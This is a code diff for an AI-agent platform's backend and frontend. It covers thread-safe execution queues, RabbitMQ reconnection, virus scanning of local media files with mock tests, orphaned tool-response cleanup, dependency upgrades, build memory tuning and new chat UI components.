 class ExecutionQueue(Generic[T]):
    """
-    Queue for managing the execution of agents.
-    This will be shared between different processes
+    Thread-safe queue for managing node execution within a single graph execution.
+
+    Note: Uses queue.Queue (not multiprocessing.Queue) since all access is from
+    threads within the same process. If migrating back to ProcessPoolExecutor,
+    replace with multiprocessing.Manager().Queue() for cross-process safety.
    """

    def __init__(self):
-        self.queue = Manager().Queue()
+        # Thread-safe queue (not multiprocessing) — see class docstring
+        self.queue: queue.Queue[T] = queue.Queue()

    def add(self, execution: T) -> T:
        self.queue.put(execution)
@@ -1220,7 +1223,7 @@ class ExecutionQueue(Generic[T]):
    def get_or_none(self) -> T | None:
        try:
            return self.queue.get_nowait()
-        except Empty:
+        except queue.Empty:
            return None


--- a/autogpt_platform/backend/backend/data/execution_queue_test.py
+++ b/autogpt_platform/backend/backend/data/execution_queue_test.py
@@ -0,0 +1,58 @@
+"""Tests for ExecutionQueue thread-safety."""
+
+import queue
+import threading
+
+from backend.data.execution import ExecutionQueue
+
+
+def test_execution_queue_uses_stdlib_queue():
+    """Verify ExecutionQueue uses queue.Queue (not multiprocessing)."""
+    q = ExecutionQueue()
+    assert isinstance(q.queue, queue.Queue)
+
+
+def test_basic_operations():
+    """Test add, get, empty, and get_or_none."""
+    q = ExecutionQueue()
+
+    assert q.empty() is True
+    assert q.get_or_none() is None
+
+    result = q.add("item1")
+    assert result == "item1"
+    assert q.empty() is False
+
+    item = q.get()
+    assert item == "item1"
+    assert q.empty() is True
+
+
+def test_thread_safety():
+    """Test concurrent access from multiple threads."""
+    q = ExecutionQueue()
+    results = []
+    num_items = 100
+
+    def producer():
+        for i in range(num_items):
+            q.add(f"item_{i}")
+
+    def consumer():
+        count = 0
+        while count < num_items:
+            item = q.get_or_none()
+            if item is not None:
+                results.append(item)
+                count += 1
+
+    producer_thread = threading.Thread(target=producer)
+    consumer_thread = threading.Thread(target=consumer)
+
+    producer_thread.start()
+    consumer_thread.start()
+
+    producer_thread.join(timeout=5)
+    consumer_thread.join(timeout=5)
+
+    assert len(results) == num_items
--- a/autogpt_platform/backend/backend/data/graph.py
+++ b/autogpt_platform/backend/backend/data/graph.py
@@ -743,6 +743,11 @@ class GraphModel(Graph, GraphMeta):
                # For invalid blocks, we still raise immediately as this is a structural issue
                raise ValueError(f"Invalid block {node.block_id} for node #{node.id}")

+            if block.disabled:
+                raise ValueError(
+                    f"Block {node.block_id} is disabled and cannot be used in graphs"
+                )
+
            node_input_mask = (
                nodes_input_masks.get(node.id, {}) if nodes_input_masks else {}
            )
--- a/autogpt_platform/backend/backend/data/rabbitmq.py
+++ b/autogpt_platform/backend/backend/data/rabbitmq.py
@@ -1,3 +1,4 @@
+import asyncio
 import logging
 from abc import ABC, abstractmethod
 from enum import Enum
@@ -225,6 +226,10 @@ class SyncRabbitMQ(RabbitMQBase):
 class AsyncRabbitMQ(RabbitMQBase):
    """Asynchronous RabbitMQ client"""

+    def __init__(self, config: RabbitMQConfig):
+        super().__init__(config)
+        self._reconnect_lock: asyncio.Lock | None = None
+
    @property
    def is_connected(self) -> bool:
        return bool(self._connection and not self._connection.is_closed)
@@ -235,7 +240,17 @@ class AsyncRabbitMQ(RabbitMQBase):

    @conn_retry("AsyncRabbitMQ", "Acquiring async connection")
    async def connect(self):
-        if self.is_connected:
+        if self.is_connected and self._channel and not self._channel.is_closed:
+            return
+
+        if (
+            self.is_connected
+            and self._connection
+            and (self._channel is None or self._channel.is_closed)
+        ):
+            self._channel = await self._connection.channel()
+            await self._channel.set_qos(prefetch_count=1)
+            await self.declare_infrastructure()
            return

        self._connection = await aio_pika.connect_robust(
@@ -291,24 +306,46 @@ class AsyncRabbitMQ(RabbitMQBase):
                    exchange, routing_key=queue.routing_key or queue.name
                )

-    @func_retry
-    async def publish_message(
+    @property
+    def _lock(self) -> asyncio.Lock:
+        if self._reconnect_lock is None:
+            self._reconnect_lock = asyncio.Lock()
+        return self._reconnect_lock
+
+    async def _ensure_channel(self) -> aio_pika.abc.AbstractChannel:
+        """Get a valid channel, reconnecting if the current one is stale.
+
+        Uses a lock to prevent concurrent reconnection attempts from racing.
+        """
+        if self.is_ready:
+            return self._channel  # type: ignore  # is_ready guarantees non-None
+
+        async with self._lock:
+            # Double-check after acquiring lock
+            if self.is_ready:
+                return self._channel  # type: ignore
+
+            self._channel = None
+            await self.connect()
+
+            if self._channel is None:
+                raise RuntimeError("Channel should be established after connect")
+
+            return self._channel
+
+    async def _publish_once(
        self,
        routing_key: str,
        message: str,
        exchange: Optional[Exchange] = None,
        persistent: bool = True,
    ) -> None:
-        if not self.is_ready:
-            await self.connect()
-
-        if self._channel is None:
-            raise RuntimeError("Channel should be established after connect")
+        channel = await self._ensure_channel()

        if exchange:
-            exchange_obj = await self._channel.get_exchange(exchange.name)
+            exchange_obj = await channel.get_exchange(exchange.name)
        else:
-            exchange_obj = self._channel.default_exchange
+            exchange_obj = channel.default_exchange

        await exchange_obj.publish(
            aio_pika.Message(
@@ -322,9 +359,23 @@ class AsyncRabbitMQ(RabbitMQBase):
            routing_key=routing_key,
        )

+    @func_retry
+    async def publish_message(
+        self,
+        routing_key: str,
+        message: str,
+        exchange: Optional[Exchange] = None,
+        persistent: bool = True,
+    ) -> None:
+        try:
+            await self._publish_once(routing_key, message, exchange, persistent)
+        except aio_pika.exceptions.ChannelInvalidStateError:
+            logger.warning(
+                "RabbitMQ channel invalid, forcing reconnect and retrying publish"
+            )
+            async with self._lock:
+                self._channel = None
+            await self._publish_once(routing_key, message, exchange, persistent)
+
    async def get_channel(self) -> aio_pika.abc.AbstractChannel:
-        if not self.is_ready:
-            await self.connect()
-        if self._channel is None:
-            raise RuntimeError("Channel should be established after connect")
-        return self._channel
+        return await self._ensure_channel()
--- a/autogpt_platform/backend/backend/executor/manager.py
+++ b/autogpt_platform/backend/backend/executor/manager.py
@@ -213,6 +213,9 @@ async def execute_node(
        block_name=node_block.name,
    )

+    if node_block.disabled:
+        raise ValueError(f"Block {node_block.id} is disabled and cannot be executed")
+
    # Sanity check: validate the execution input.
    input_data, error = validate_exec(node, data.inputs, resolve_input=False)
    if input_data is None:
--- a/autogpt_platform/backend/backend/util/file.py
+++ b/autogpt_platform/backend/backend/util/file.py
@@ -342,6 +342,14 @@ async def store_media_file(
        if not target_path.is_file():
            raise ValueError(f"Local file does not exist: {target_path}")

+        # Virus scan the local file before any further processing
+        local_content = target_path.read_bytes()
+        if len(local_content) > MAX_FILE_SIZE_BYTES:
+            raise ValueError(
+                f"File too large: {len(local_content)} bytes > {MAX_FILE_SIZE_BYTES} bytes"
+            )
+        await scan_content_safe(local_content, filename=sanitized_file)
+
    # Return based on requested format
    if return_format == "for_local_processing":
        # Use when processing files locally with tools like ffmpeg, MoviePy, PIL
--- a/autogpt_platform/backend/backend/util/file_test.py
+++ b/autogpt_platform/backend/backend/util/file_test.py
@@ -247,3 +247,100 @@ class TestFileCloudIntegration:
                    execution_context=make_test_context(graph_exec_id=graph_exec_id),
                    return_format="for_local_processing",
                )
+
+    @pytest.mark.asyncio
+    async def test_store_media_file_local_path_scanned(self):
+        """Test that local file paths are scanned for viruses."""
+        graph_exec_id = "test-exec-123"
+        local_file = "test_video.mp4"
+        file_content = b"fake video content"
+
+        with patch(
+            "backend.util.file.get_cloud_storage_handler"
+        ) as mock_handler_getter, patch(
+            "backend.util.file.scan_content_safe"
+        ) as mock_scan, patch(
+            "backend.util.file.Path"
+        ) as mock_path_class:
+
+            # Mock cloud storage handler - not a cloud path
+            mock_handler = MagicMock()
+            mock_handler.is_cloud_path.return_value = False
+            mock_handler_getter.return_value = mock_handler
+
+            # Mock virus scanner
+            mock_scan.return_value = None
+
+            # Mock file system operations
+            mock_base_path = MagicMock()
+            mock_target_path = MagicMock()
+            mock_resolved_path = MagicMock()
+
+            mock_path_class.return_value = mock_base_path
+            mock_base_path.mkdir = MagicMock()
+            mock_base_path.__truediv__ = MagicMock(return_value=mock_target_path)
+            mock_target_path.resolve.return_value = mock_resolved_path
+            mock_resolved_path.is_relative_to.return_value = True
+            mock_resolved_path.is_file.return_value = True
+            mock_resolved_path.read_bytes.return_value = file_content
+            mock_resolved_path.relative_to.return_value = Path(local_file)
+            mock_resolved_path.name = local_file
+
+            result = await store_media_file(
+                file=MediaFileType(local_file),
+                execution_context=make_test_context(graph_exec_id=graph_exec_id),
+                return_format="for_local_processing",
+            )
+
+            # Verify virus scan was called for local file
+            mock_scan.assert_called_once_with(file_content, filename=local_file)
+
+            # Result should be the relative path
+            assert str(result) == local_file
+
+    @pytest.mark.asyncio
+    async def test_store_media_file_local_path_virus_detected(self):
+        """Test that infected local files raise VirusDetectedError."""
+        from backend.api.features.store.exceptions import VirusDetectedError
+
+        graph_exec_id = "test-exec-123"
+        local_file = "infected.exe"
+        file_content = b"malicious content"
+
+        with patch(
+            "backend.util.file.get_cloud_storage_handler"
+        ) as mock_handler_getter, patch(
+            "backend.util.file.scan_content_safe"
+        ) as mock_scan, patch(
+            "backend.util.file.Path"
+        ) as mock_path_class:
+
+            # Mock cloud storage handler - not a cloud path
+            mock_handler = MagicMock()
+            mock_handler.is_cloud_path.return_value = False
+            mock_handler_getter.return_value = mock_handler
+
+            # Mock virus scanner to detect virus
+            mock_scan.side_effect = VirusDetectedError(
+                "EICAR-Test-File", "File rejected due to virus detection"
+            )
+
+            # Mock file system operations
+            mock_base_path = MagicMock()
+            mock_target_path = MagicMock()
+            mock_resolved_path = MagicMock()
+
+            mock_path_class.return_value = mock_base_path
+            mock_base_path.mkdir = MagicMock()
+            mock_base_path.__truediv__ = MagicMock(return_value=mock_target_path)
+            mock_target_path.resolve.return_value = mock_resolved_path
+            mock_resolved_path.is_relative_to.return_value = True
+            mock_resolved_path.is_file.return_value = True
+            mock_resolved_path.read_bytes.return_value = file_content
+
+            with pytest.raises(VirusDetectedError):
+                await store_media_file(
+                    file=MediaFileType(local_file),
+                    execution_context=make_test_context(graph_exec_id=graph_exec_id),
+                    return_format="for_local_processing",
+                )
--- a/autogpt_platform/backend/backend/util/prompt.py
+++ b/autogpt_platform/backend/backend/util/prompt.py
@@ -364,6 +364,44 @@ def _remove_orphan_tool_responses(
    return result


+def validate_and_remove_orphan_tool_responses(
+    messages: list[dict],
+    log_warning: bool = True,
+) -> list[dict]:
+    """
+    Validate tool_call/tool_response pairs and remove orphaned responses.
+
+    Scans messages in order, tracking all tool_call IDs. Any tool response
+    referencing an ID not seen in a preceding message is considered orphaned
+    and removed. This prevents API errors like Anthropic's "unexpected tool_use_id".
+
+    Args:
+        messages: List of messages to validate (OpenAI or Anthropic format)
+        log_warning: Whether to log a warning when orphans are found
+
+    Returns:
+        A new list with orphaned tool responses removed
+    """
+    available_ids: set[str] = set()
+    orphan_ids: set[str] = set()
+
+    for msg in messages:
+        available_ids |= _extract_tool_call_ids_from_message(msg)
+        for resp_id in _extract_tool_response_ids_from_message(msg):
+            if resp_id not in available_ids:
+                orphan_ids.add(resp_id)
+
+    if not orphan_ids:
+        return messages
+
+    if log_warning:
+        logger.warning(
+            f"Removing {len(orphan_ids)} orphan tool response(s): {orphan_ids}"
+        )
+
+    return _remove_orphan_tool_responses(messages, orphan_ids)
+
+
 def _ensure_tool_pairs_intact(
    recent_messages: list[dict],
    all_messages: list[dict],
@@ -723,6 +761,13 @@ async def compress_context(

    # Filter out any None values that may have been introduced
    final_msgs: list[dict] = [m for m in msgs if m is not None]
+
+    # ---- STEP 6: Final tool-pair validation ---------------------------------
+    # After all compression steps, verify that every tool response has a
+    # matching tool_call in a preceding assistant message. Remove orphans
+    # to prevent API errors (e.g., Anthropic's "unexpected tool_use_id").
+    final_msgs = validate_and_remove_orphan_tool_responses(final_msgs)
+
    final_count = sum(_msg_tokens(m, enc) for m in final_msgs)
    error = None
    if final_count + reserve > target_tokens:
--- a/autogpt_platform/backend/poetry.lock
+++ b/autogpt_platform/backend/poetry.lock
--- a/autogpt_platform/backend/pyproject.toml
+++ b/autogpt_platform/backend/pyproject.toml
@@ -12,16 +12,17 @@ python = ">=3.10,<3.14"
 aio-pika = "^9.5.5"
 aiohttp = "^3.10.0"
 aiodns = "^3.5.0"
-anthropic = "^0.59.0"
+anthropic = "^0.79.0"
 apscheduler = "^3.11.1"
 autogpt-libs = { path = "../autogpt_libs", develop = true }
 bleach = { extras = ["css"], version = "^6.2.0" }
+claude-agent-sdk = "^0.1.0"
 click = "^8.2.0"
-cryptography = "^45.0"
+cryptography = "^46.0"
 discord-py = "^2.5.2"
 e2b-code-interpreter = "^1.5.2"
 elevenlabs = "^1.50.0"
-fastapi = "^0.116.1"
+fastapi = "^0.128.6"
 feedparser = "^6.0.11"
 flake8 = "^7.3.0"
 google-api-python-client = "^2.177.0"
@@ -34,11 +35,11 @@ html2text = "^2024.2.26"
 jinja2 = "^3.1.6"
 jsonref = "^1.1.0"
 jsonschema = "^4.25.0"
-langfuse = "^3.11.0"
-launchdarkly-server-sdk = "^9.12.0"
+langfuse = "^3.14.1"
+launchdarkly-server-sdk = "^9.14.1"
 mem0ai = "^0.1.115"
 moviepy = "^2.1.2"
-ollama = "^0.5.1"
+ollama = "^0.6.1"
 openai = "^1.97.1"
 orjson = "^3.10.0"
 pika = "^1.3.2"
@@ -48,16 +49,16 @@ postmarker = "^1.0"
 praw = "~7.8.1"
 prisma = "^0.15.0"
 rank-bm25 = "^0.2.2"
-prometheus-client = "^0.22.1"
+prometheus-client = "^0.24.1"
 prometheus-fastapi-instrumentator = "^7.0.0"
 psutil = "^7.0.0"
 psycopg2-binary = "^2.9.10"
-pydantic = { extras = ["email"], version = "^2.11.7" }
-pydantic-settings = "^2.10.1"
+pydantic = { extras = ["email"], version = "^2.12.5" }
+pydantic-settings = "^2.12.0"
 pytest = "^8.4.1"
 pytest-asyncio = "^1.1.0"
 python-dotenv = "^1.1.1"
-python-multipart = "^0.0.20"
+python-multipart = "^0.0.22"
 redis = "^6.2.0"
 regex = "^2025.9.18"
 replicate = "^1.0.6"
@@ -65,19 +66,19 @@ sentry-sdk = {extras = ["anthropic", "fastapi", "launchdarkly", "openai", "sqlal
 sqlalchemy = "^2.0.40"
 strenum = "^0.4.9"
 stripe = "^11.5.0"
-supabase = "2.17.0"
-tenacity = "^9.1.2"
+supabase = "2.27.3"
+tenacity = "^9.1.4"
 todoist-api-python = "^2.1.7"
 tweepy = "^4.16.0"
-uvicorn = { extras = ["standard"], version = "^0.35.0" }
+uvicorn = { extras = ["standard"], version = "^0.40.0" }
 websockets = "^15.0"
 youtube-transcript-api = "^1.2.1"
 yt-dlp = "2025.12.08"
 zerobouncesdk = "^1.1.2"
 # NOTE: please insert new dependencies in their alphabetical location
 pytest-snapshot = "^0.9.0"
-aiofiles = "^24.1.0"
-tiktoken = "^0.9.0"
+aiofiles = "^25.1.0"
+tiktoken = "^0.12.0"
 aioclamd = "^1.0.0"
 setuptools = "^80.9.0"
 gcloud-aio-storage = "^9.5.0"
@@ -95,13 +96,13 @@ black = "^24.10.0"
 faker = "^38.2.0"
 httpx = "^0.28.1"
 isort = "^5.13.2"
-poethepoet = "^0.37.0"
+poethepoet = "^0.41.0"
 pre-commit = "^4.4.0"
 pyright = "^1.1.407"
 pytest-mock = "^3.15.1"
-pytest-watcher = "^0.4.2"
+pytest-watcher = "^0.6.3"
 requests = "^2.32.5"
-ruff = "^0.14.5"
+ruff = "^0.15.0"
 # NOTE: please insert new dependencies in their alphabetical location

 [build-system]
--- a/autogpt_platform/frontend/Dockerfile
+++ b/autogpt_platform/frontend/Dockerfile
@@ -25,8 +25,12 @@ RUN if [ -f .env.production ]; then \
      cp .env.default .env; \
    fi
 RUN pnpm run generate:api
+# Disable source-map generation in Docker builds to halve webpack memory usage.
+# Source maps are only useful when SENTRY_AUTH_TOKEN is set (Vercel deploys);
+# the Docker image never uploads them, so generating them just wastes RAM.
+ENV NEXT_PUBLIC_SOURCEMAPS="false"
 # In CI, we want NEXT_PUBLIC_PW_TEST=true during build so Next.js inlines it
-RUN if [ "$NEXT_PUBLIC_PW_TEST" = "true" ]; then NEXT_PUBLIC_PW_TEST=true NODE_OPTIONS="--max-old-space-size=4096" pnpm build; else NODE_OPTIONS="--max-old-space-size=4096" pnpm build; fi
+RUN if [ "$NEXT_PUBLIC_PW_TEST" = "true" ]; then NEXT_PUBLIC_PW_TEST=true NODE_OPTIONS="--max-old-space-size=8192" pnpm build; else NODE_OPTIONS="--max-old-space-size=8192" pnpm build; fi

 # Prod stage - based on NextJS reference Dockerfile https://github.com/vercel/next.js/blob/64271354533ed16da51be5dce85f0dbd15f17517/examples/with-docker/Dockerfile
 FROM node:21-alpine AS prod
--- a/autogpt_platform/frontend/next.config.mjs
+++ b/autogpt_platform/frontend/next.config.mjs
@@ -1,8 +1,12 @@
 import { withSentryConfig } from "@sentry/nextjs";

+// Allow Docker builds to skip source-map generation (halves memory usage).
+// Defaults to true so Vercel/local builds are unaffected.
+const enableSourceMaps = process.env.NEXT_PUBLIC_SOURCEMAPS !== "false";
+
 /** @type {import('next').NextConfig} */
 const nextConfig = {
-  productionBrowserSourceMaps: true,
+  productionBrowserSourceMaps: enableSourceMaps,
  // Externalize OpenTelemetry packages to fix Turbopack HMR issues
  serverExternalPackages: [
    "@opentelemetry/instrumentation",
@@ -14,9 +18,37 @@ const nextConfig = {
    serverActions: {
      bodySizeLimit: "256mb",
    },
-    // Increase body size limit for API routes (file uploads) - 256MB to match backend limit
-    proxyClientMaxBodySize: "256mb",
    middlewareClientMaxBodySize: "256mb",
+    // Limit parallel webpack workers to reduce peak memory during builds.
+    cpus: 2,
+  },
+  // Work around cssnano "Invalid array length" bug in Next.js's bundled
+  // cssnano-simple comment parser when processing very large CSS chunks.
+  // CSS is still bundled correctly; gzip handles most of the size savings anyway.
+  webpack: (config, { dev }) => {
+    if (!dev) {
+      // Next.js adds CssMinimizerPlugin internally (after user config), so we
+      // can't filter it from config.plugins. Instead, intercept the webpack
+      // compilation hooks and replace the buggy plugin's tap with a no-op.
+      config.plugins.push({
+        apply(compiler) {
+          compiler.hooks.compilation.tap(
+            "DisableCssMinimizer",
+            (compilation) => {
+              compilation.hooks.processAssets.intercept({
+                register: (tap) => {
+                  if (tap.name === "CssMinimizerPlugin") {
+                    return { ...tap, fn: async () => {} };
+                  }
+                  return tap;
+                },
+              });
+            },
+          );
+        },
+      });
+    }
+    return config;
  },
  images: {
    domains: [
@@ -54,9 +86,16 @@ const nextConfig = {
  transpilePackages: ["geist"],
 };

-const isDevelopmentBuild = process.env.NODE_ENV !== "production";
+// Only run the Sentry webpack plugin when we can actually upload source maps
+// (i.e. on Vercel with SENTRY_AUTH_TOKEN set). The Sentry *runtime* SDK
+// (imported in app code) still captures errors without the plugin.
+// Skipping the plugin saves ~1 GB of peak memory during `next build`.
+const skipSentryPlugin =
+  process.env.NODE_ENV !== "production" ||
+  !enableSourceMaps ||
+  !process.env.SENTRY_AUTH_TOKEN;

-export default isDevelopmentBuild
+export default skipSentryPlugin
  ? nextConfig
  : withSentryConfig(nextConfig, {
      // For all available options, see:
@@ -96,7 +135,7 @@ export default isDevelopmentBuild

      // This helps Sentry with sourcemaps... https://docs.sentry.io/platforms/javascript/guides/nextjs/sourcemaps/
      sourcemaps: {
-        disable: false,
+        disable: !enableSourceMaps,
        assets: [".next/**/*.js", ".next/**/*.js.map"],
        ignore: ["**/node_modules/**"],
        deleteSourcemapsAfterUpload: false, // Source is public anyway :)
--- a/autogpt_platform/frontend/package.json
+++ b/autogpt_platform/frontend/package.json
@@ -7,7 +7,7 @@
  },
  "scripts": {
    "dev": "pnpm run generate:api:force && next dev --turbo",
-    "build": "next build",
+    "build": "cross-env NODE_OPTIONS=--max-old-space-size=16384 next build",
    "start": "next start",
    "start:standalone": "cd .next/standalone && node server.js",
    "lint": "next lint && prettier --check .",
@@ -30,6 +30,7 @@
    "defaults"
  ],
  "dependencies": {
+    "@ai-sdk/react": "3.0.61",
    "@faker-js/faker": "10.0.0",
    "@hookform/resolvers": "5.2.2",
    "@next/third-parties": "15.4.6",
@@ -60,6 +61,10 @@
    "@rjsf/utils": "6.1.2",
    "@rjsf/validator-ajv8": "6.1.2",
    "@sentry/nextjs": "10.27.0",
+    "@streamdown/cjk": "1.0.1",
+    "@streamdown/code": "1.0.1",
+    "@streamdown/math": "1.0.1",
+    "@streamdown/mermaid": "1.0.1",
    "@supabase/ssr": "0.7.0",
    "@supabase/supabase-js": "2.78.0",
    "@tanstack/react-query": "5.90.6",
@@ -68,6 +73,7 @@
    "@vercel/analytics": "1.5.0",
    "@vercel/speed-insights": "1.2.0",
    "@xyflow/react": "12.9.2",
+    "ai": "6.0.59",
    "boring-avatars": "1.11.2",
    "class-variance-authority": "0.7.1",
    "clsx": "2.1.1",
@@ -87,7 +93,6 @@
    "launchdarkly-react-client-sdk": "3.9.0",
    "lodash": "4.17.21",
    "lucide-react": "0.552.0",
-    "moment": "2.30.1",
    "next": "15.4.10",
    "next-themes": "0.4.6",
    "nuqs": "2.7.2",
@@ -102,7 +107,7 @@
    "react-markdown": "9.0.3",
    "react-modal": "3.16.3",
    "react-shepherd": "6.1.9",
-    "react-window": "1.8.11",
+    "react-window": "2.2.0",
    "recharts": "3.3.0",
    "rehype-autolink-headings": "7.1.0",
    "rehype-highlight": "7.0.2",
@@ -112,9 +117,11 @@
    "remark-math": "6.0.0",
    "shepherd.js": "14.5.1",
    "sonner": "2.0.7",
+    "streamdown": "2.1.0",
    "tailwind-merge": "2.6.0",
    "tailwind-scrollbar": "3.1.0",
    "tailwindcss-animate": "1.0.7",
+    "use-stick-to-bottom": "1.1.2",
    "uuid": "11.1.0",
    "vaul": "1.1.2",
    "zod": "3.25.76",
@@ -140,7 +147,7 @@
    "@types/react": "18.3.17",
    "@types/react-dom": "18.3.5",
    "@types/react-modal": "3.16.3",
-    "@types/react-window": "1.8.8",
+    "@types/react-window": "2.0.0",
    "@vitejs/plugin-react": "5.1.2",
    "axe-playwright": "2.2.2",
    "chromatic": "13.3.3",
@@ -172,7 +179,8 @@
  },
  "pnpm": {
    "overrides": {
-      "@opentelemetry/instrumentation": "0.209.0"
+      "@opentelemetry/instrumentation": "0.209.0",
+      "lodash-es": "4.17.23"
    }
  },
  "packageManager": "pnpm@10.20.0+sha512.cf9998222162dd85864d0a8102e7892e7ba4ceadebbf5a31f9c2fce48dfce317a9c53b9f6464d1ef9042cba2e02ae02a9f7c143a2b438cd93c91840f0192b9dd"
--- a/autogpt_platform/frontend/pnpm-lock.yaml
+++ b/autogpt_platform/frontend/pnpm-lock.yaml
--- a/autogpt_platform/frontend/src/app/(platform)/build/components/NewControlPanel/NewBlockMenu/BlockMenuSearchBar/useBlockMenuSearchBar.ts
+++ b/autogpt_platform/frontend/src/app/(platform)/build/components/NewControlPanel/NewBlockMenu/BlockMenuSearchBar/useBlockMenuSearchBar.ts
@@ -1,4 +1,4 @@
-import { debounce } from "lodash";
+import debounce from "lodash/debounce";
 import { useCallback, useEffect, useRef, useState } from "react";
 import { useBlockMenuStore } from "../../../../stores/blockMenuStore";
 import { getQueryClient } from "@/lib/react-query/queryClient";
--- a/autogpt_platform/frontend/src/app/(platform)/build/components/NewControlPanel/NewBlockMenu/HorizontalScroll.tsx
+++ b/autogpt_platform/frontend/src/app/(platform)/build/components/NewControlPanel/NewBlockMenu/HorizontalScroll.tsx
@@ -70,10 +70,10 @@ export const HorizontalScroll: React.FC<HorizontalScrollAreaProps> = ({
          {children}
        </div>
        {canScrollLeft && (
-          <div className="pointer-events-none absolute inset-y-0 left-0 w-8 bg-gradient-to-r from-white via-white/80 to-white/0" />
+          <div className="pointer-events-none absolute inset-y-0 left-0 w-8 bg-gradient-to-r from-background via-background/80 to-background/0" />
        )}
        {canScrollRight && (
-          <div className="pointer-events-none absolute inset-y-0 right-0 w-8 bg-gradient-to-l from-white via-white/80 to-white/0" />
+          <div className="pointer-events-none absolute inset-y-0 right-0 w-8 bg-gradient-to-l from-background via-background/80 to-background/0" />
        )}
        {canScrollLeft && (
          <button
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/CopilotPage.tsx
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/CopilotPage.tsx
@@ -0,0 +1,80 @@
+"use client";
+
+import { SidebarProvider } from "@/components/ui/sidebar";
+import { ChatContainer } from "./components/ChatContainer/ChatContainer";
+import { ChatSidebar } from "./components/ChatSidebar/ChatSidebar";
+import { MobileDrawer } from "./components/MobileDrawer/MobileDrawer";
+import { MobileHeader } from "./components/MobileHeader/MobileHeader";
+import { ScaleLoader } from "./components/ScaleLoader/ScaleLoader";
+import { useCopilotPage } from "./useCopilotPage";
+
+export function CopilotPage() {
+  const {
+    sessionId,
+    messages,
+    status,
+    error,
+    stop,
+    createSession,
+    onSend,
+    isLoadingSession,
+    isCreatingSession,
+    isUserLoading,
+    isLoggedIn,
+    // Mobile drawer
+    isMobile,
+    isDrawerOpen,
+    sessions,
+    isLoadingSessions,
+    handleOpenDrawer,
+    handleCloseDrawer,
+    handleDrawerOpenChange,
+    handleSelectSession,
+    handleNewChat,
+  } = useCopilotPage();
+
+  if (isUserLoading || !isLoggedIn) {
+    return (
+      <div className="fixed inset-0 z-50 flex items-center justify-center bg-[#f8f8f9]">
+        <ScaleLoader className="text-neutral-400" />
+      </div>
+    );
+  }
+
+  return (
+    <SidebarProvider
+      defaultOpen={true}
+      className="h-[calc(100vh-72px)] min-h-0"
+    >
+      {!isMobile && <ChatSidebar />}
+      <div className="relative flex h-full w-full flex-col overflow-hidden bg-[#f8f8f9] px-0">
+        {isMobile && <MobileHeader onOpenDrawer={handleOpenDrawer} />}
+        <div className="flex-1 overflow-hidden">
+          <ChatContainer
+            messages={messages}
+            status={status}
+            error={error}
+            sessionId={sessionId}
+            isLoadingSession={isLoadingSession}
+            isCreatingSession={isCreatingSession}
+            onCreateSession={createSession}
+            onSend={onSend}
+            onStop={stop}
+          />
+        </div>
+      </div>
+      {isMobile && (
+        <MobileDrawer
+          isOpen={isDrawerOpen}
+          sessions={sessions}
+          currentSessionId={sessionId}
+          isLoading={isLoadingSessions}
+          onSelectSession={handleSelectSession}
+          onNewChat={handleNewChat}
+          onClose={handleCloseDrawer}
+          onOpenChange={handleDrawerOpenChange}
+        />
+      )}
+    </SidebarProvider>
+  );
+}
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/ChatContainer/ChatContainer.tsx
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/ChatContainer/ChatContainer.tsx
@@ -0,0 +1,74 @@
+"use client";
+import { ChatInput } from "@/app/(platform)/copilot/components/ChatInput/ChatInput";
+import { UIDataTypes, UIMessage, UITools } from "ai";
+import { LayoutGroup, motion } from "framer-motion";
+import { ChatMessagesContainer } from "../ChatMessagesContainer/ChatMessagesContainer";
+import { CopilotChatActionsProvider } from "../CopilotChatActionsProvider/CopilotChatActionsProvider";
+import { EmptySession } from "../EmptySession/EmptySession";
+
+export interface ChatContainerProps {
+  messages: UIMessage<unknown, UIDataTypes, UITools>[];
+  status: string;
+  error: Error | undefined;
+  sessionId: string | null;
+  isLoadingSession: boolean;
+  isCreatingSession: boolean;
+  onCreateSession: () => void | Promise<string>;
+  onSend: (message: string) => void | Promise<void>;
+  onStop: () => void;
+}
+export const ChatContainer = ({
+  messages,
+  status,
+  error,
+  sessionId,
+  isLoadingSession,
+  isCreatingSession,
+  onCreateSession,
+  onSend,
+  onStop,
+}: ChatContainerProps) => {
+  const inputLayoutId = "copilot-2-chat-input";
+
+  return (
+    <CopilotChatActionsProvider onSend={onSend}>
+      <LayoutGroup id="copilot-2-chat-layout">
+        <div className="flex h-full min-h-0 w-full flex-col bg-[#f8f8f9] px-2 lg:px-0">
+          {sessionId ? (
+            <div className="mx-auto flex h-full min-h-0 w-full max-w-3xl flex-col">
+              <ChatMessagesContainer
+                messages={messages}
+                status={status}
+                error={error}
+                isLoading={isLoadingSession}
+              />
+              <motion.div
+                initial={{ opacity: 0 }}
+                animate={{ opacity: 1 }}
+                transition={{ duration: 0.3 }}
+                className="relative px-3 pb-2 pt-2"
+              >
+                <div className="pointer-events-none absolute left-0 right-0 top-[-18px] z-10 h-6 bg-gradient-to-b from-transparent to-[#f8f8f9]" />
+                <ChatInput
+                  inputId="chat-input-session"
+                  onSend={onSend}
+                  disabled={status === "streaming"}
+                  isStreaming={status === "streaming"}
+                  onStop={onStop}
+                  placeholder="What else can I help with?"
+                />
+              </motion.div>
+            </div>
+          ) : (
+            <EmptySession
+              inputLayoutId={inputLayoutId}
+              isCreatingSession={isCreatingSession}
+              onCreateSession={onCreateSession}
+              onSend={onSend}
+            />
+          )}
+        </div>
+      </LayoutGroup>
+    </CopilotChatActionsProvider>
+  );
+};
--- a/autogpt_platform/frontend/src/components/contextual/Chat/components/ChatInput/ChatInput.tsx
+++ b/autogpt_platform/frontend/src/components/contextual/Chat/components/ChatInput/ChatInput.tsx
@@ -6,17 +6,19 @@ import {
  MicrophoneIcon,
  StopIcon,
 } from "@phosphor-icons/react";
+import { ChangeEvent, useCallback } from "react";
 import { RecordingIndicator } from "./components/RecordingIndicator";
 import { useChatInput } from "./useChatInput";
 import { useVoiceRecording } from "./useVoiceRecording";

 export interface Props {
-  onSend: (message: string) => void;
+  onSend: (message: string) => void | Promise<void>;
  disabled?: boolean;
  isStreaming?: boolean;
  onStop?: () => void;
  placeholder?: string;
  className?: string;
+  inputId?: string;
 }

 export function ChatInput({
@@ -26,14 +28,14 @@ export function ChatInput({
  onStop,
  placeholder = "Type your message...",
  className,
+  inputId = "chat-input",
 }: Props) {
-  const inputId = "chat-input";
  const {
    value,
    setValue,
    handleKeyDown: baseHandleKeyDown,
    handleSubmit,
-    handleChange,
+    handleChange: baseHandleChange,
    hasMultipleLines,
  } = useChatInput({
    onSend,
